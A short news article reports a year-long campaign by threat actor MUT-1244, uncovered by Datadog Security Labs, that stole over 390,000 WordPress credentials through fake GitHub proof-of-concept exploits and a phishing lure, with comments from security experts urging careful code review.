Major Security Breach: Over 390,000 WordPress Credentials Stolen in Targeted Campaign Against Security Researchers and Pentesters
Title: Major Cyber Heist: 390,000 WordPress Credentials Stolen in Targeted Campaign
In a shocking cybersecurity breach, researchers from Datadog Security Labs have uncovered the extensive theft of over 390,000 WordPress credentials linked to a threat actor known as MUT-1244. This theft is the culmination of a year-long, large-scale operation that cunningly targeted a mix of cybersecurity professionals, including penetration testers and even rival malicious actors.
The attackers’ strategy employed sophisticated tactics, including the deployment of dozens of fraudulent GitHub repositories populated with fake proof-of-concept exploits. As victims unwittingly downloaded and executed this malicious code, second-stage payloads ensnared their credentials. Not only did this operation leverage the trust placed in established threat intelligence feeds, but it also included an elaborate phishing campaign designed to coax targets into installing a fake kernel update, further expanding the attackers’ reach.
Security experts have expressed their concerns regarding this attack methodology. Casey Ellis, Founder and Advisor at Bugcrowd, described the tactics as a reminder that even those who offer offensive security services can become part of an exploitable supply chain. Jason Soroko, Senior Fellow at Sectigo, emphasized the implications of this supply chain attack, noting how it undermined standard software acquisition processes by poisoning trusted sources.
“Security professionals must treat all code as potentially dangerous, even from established platforms,” cautioned Stephen Kowski, Field CTO at SlashNext Email Security+. He highlighted the necessity for robust verification measures and advanced threat detection tools to identify malicious patterns in real time.
This breach is a wake-up call for the cybersecurity community, underscoring the critical need for increased vigilance in code review and the implementation of automated security scanning solutions to prevent similar incidents in the future.